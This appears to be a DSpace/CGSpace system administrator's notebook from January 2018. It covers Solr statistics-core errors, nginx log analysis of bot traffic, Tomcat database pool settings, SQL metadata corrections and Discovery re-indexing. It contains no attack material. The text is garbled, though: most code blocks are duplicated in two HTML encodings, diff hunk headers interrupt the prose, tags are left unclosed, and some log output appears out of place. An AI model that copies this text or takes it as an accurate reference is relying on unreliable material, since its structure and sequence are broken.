127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabi
n&amp;version=2 HTTP/1.1&quot; 409 156
<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin
&amp;version=2 HTTP/1.1&#34; 409 156
</code></pre><ul>
<li>The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error</li>
<li>This is apparently a common Solr error code that means &ldquo;version conflict&rdquo;: <a href="http://yonik.com/solr/optimistic-concurrency/">http://yonik.com/solr/optimistic-concurrency/</a></li>
<li>Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot; | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34; | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
21572 70.36.107.50
30722 70.36.107.190
34566 70.36.107.49
@ -659,18 +659,18 @@ cache_alignment : 64
</code></pre><ul>
<li>Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat&rsquo;s <code>server.xml</code>:</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&quot;jdbc/dspaceWeb&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='75'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;75&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>So theoretically I could name each connection &ldquo;xmlui&rdquo; or &ldquo;dspaceWeb&rdquo; or something meaningful and it would show up in PostgreSQL&rsquo;s <code>pg_stat_activity</code> table!</li>
<li>This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)</li>
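<li>For example, a sketch of the query that would show it:</li>
</ul>
<pre tabindex="0"><code>dspace=# select application_name, count(*) from pg_stat_activity group by application_name;
</code></pre><ul>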
@ -686,16 +686,16 @@ cache_alignment : 64
<li>I&rsquo;m looking at the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Installing+DSpace#InstallingDSpace-ServletEngine(ApacheTomcat7orlater,Jetty,CauchoResinorequivalent)">DSpace 6.0 Install docs</a> and notice they tweak the number of threads in their Tomcat connector:</li>
</ul>
<pre tabindex="0"><code>&lt;!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --&gt;
&lt;Connector port=&quot;8080&quot;
maxThreads=&quot;150&quot;
minSpareThreads=&quot;25&quot;
maxSpareThreads=&quot;75&quot;
enableLookups=&quot;false&quot;
redirectPort=&quot;8443&quot;
acceptCount=&quot;100&quot;
connectionTimeout=&quot;20000&quot;
disableUploadTimeout=&quot;true&quot;
URIEncoding=&quot;UTF-8&quot;/&gt;
&lt;Connector port=&#34;8080&#34;
maxThreads=&#34;150&#34;
minSpareThreads=&#34;25&#34;
maxSpareThreads=&#34;75&#34;
enableLookups=&#34;false&#34;
redirectPort=&#34;8443&#34;
acceptCount=&#34;100&#34;
connectionTimeout=&#34;20000&#34;
disableUploadTimeout=&#34;true&#34;
URIEncoding=&#34;UTF-8&#34;/&gt;
</code></pre><ul>
<li>In Tomcat 8.5 the <code>maxThreads</code> defaults to 200 which is probably fine, but tweaking <code>minSpareThreads</code> could be good</li>
<li>I don&rsquo;t see a setting for <code>maxSpareThreads</code> in the docs so that might be an error</li>
@ -711,8 +711,8 @@ cache_alignment : 64
<li>Still testing DSpace 6.2 on Tomcat 8.5.24</li>
<li>Catalina errors at Tomcat 8.5 startup:</li>
</ul>
<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &quot;35&quot; for &quot;maxActive&quot; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &quot;5000&quot; for &quot;maxWait&quot; property, which is being ignored.
<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &#34;35&#34; for &#34;maxActive&#34; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &#34;5000&#34; for &#34;maxWait&#34; property, which is being ignored.
</code></pre><ul>
<li>I looked in my Tomcat 7.0.82 logs and I don&rsquo;t see anything about DBCP2 errors, so I guess this a Tomcat 8.0.x or 8.5.x thing</li>
<li>DBCP2 appears to be Tomcat 8.0.x and up according to the <a href="https://tomcat.apache.org/migration-8.html">Tomcat 8.0 migration guide</a></li>
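<li>Translating the pool settings from those warnings into DBCP2 property names would be a sketch like this (only the two renamed properties change):</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspace6&#34; type=&#34;javax.sql.DataSource&#34; auth=&#34;Container&#34;
          driverClassName=&#34;org.postgresql.Driver&#34;
          url=&#34;jdbc:postgresql://localhost:5432/dspace&#34;
          maxTotal=&#34;35&#34;
          maxWaitMillis=&#34;5000&#34;
          validationQuery=&#34;SELECT 1&#34;
          testOnBorrow=&#34;true&#34;/&gt;
</code></pre><ul>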
<li>Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload</li>
<li>I&rsquo;m going to apply these ~130 corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
</code></pre><ul>
<li>Continue proofing Peter&rsquo;s author corrections that I started yesterday, faceting on non blank, non flagged, and briefly scrolling through the values of the corrections to find encoding errors for French and Spanish names</li>
</ul>
<ul>
<li>Apply corrections using <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a>:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In looking at some of the values to delete or check I found some metadata values that I could not resolve their handle via SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Tarawali&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
2757936 | 4369 | 3 | Tarawali | | 9 | | 600 | 2
(1 row)
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;4369&#39;;
handle
--------
(0 rows)
</code></pre><ul>
<li>Otherwise, the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL Helper Functions</a> provide <code>ds5_item2itemhandle()</code>, which is much easier than my long query above that I always have to go search for</li>
<li>For example, to find the Handle for an item that has the author &ldquo;Erni&rdquo;:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Erni&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
2612150 | 70308 | 3 | Erni | | 9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 | -1 | 2
dspace=# select ds5_item2itemhandle(70308);
</code></pre><ul>
<li>Next I apply the author deletions:</li>
</ul>
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now working on the affiliation corrections from Peter:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now I made a new list of affiliations for Peter to look through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4552
</code></pre><ul>
<li>Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)</li>
</ul>
<ul>
<li>Looks like we processed 2.9 million requests on CGSpace in 2017-12:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Dec/2017&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Dec/2017&#34;
2890041
real 0m25.756s
sys 0m2.210s
</code></pre><ul>
<li>Discuss standardized names for CRPs and centers with ICARDA (don&rsquo;t wait for CG Core)</li>
<li>Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)</li>
<li>Start looking at where I was with the AGROVOC API</li>
<li>Have a controlled vocabulary for CGIAR authors&rsquo; names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
<li>Need to find the metadata field name that ICARDA is using for their ORCIDs</li>
<li>Update text for DSpace version plan on wiki</li>
<li>Come up with an SLA, something like: <em>In return for your contribution we will, to the best of our ability, ensure 99.5% (&ldquo;two and a half nines&rdquo;) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, &hellip;</em></li>
<li>Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses</li>
<li>In any case, importing them like this:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &amp;&gt; lives.log
</code></pre><ul>
<li>And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload</li>
<li>When I looked there were 210 PostgreSQL connections!</li>
<li>I don&rsquo;t see any high load in XMLUI or REST/OAI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
381 40.77.167.124
403 213.55.99.121
431 207.46.13.60
593 54.91.48.104
757 104.196.152.243
776 66.249.66.90
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
11 205.201.132.14
11 40.77.167.124
15 35.226.23.240
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
[====================&gt; ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-627&#34; java.lang.OutOfMemoryError: Java heap space
at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
</code></pre><ul>
<li>I don&rsquo;t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499</li>
<li>I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the <a href="https://cgspace.cgiar.org/handle/10568/35501">Bioversity Journal Articles</a> collection</li>
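<li>A sketch of how I might find those abstracts in SQL, assuming <code>dc.description.abstract</code> in the default Dublin Core schema (it would still need to be scoped to the Limited Access items in that collection):</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 1 and element = &#39;description&#39; and qualifier = &#39;abstract&#39;);
</code></pre><ul>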
<li>Linode alerted and said that the CPU load was 264.1% on CGSpace</li>
<li>Start the Discovery indexing again:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Linode alerted again and said that CGSpace was using 301% CPU</li>
</ul>
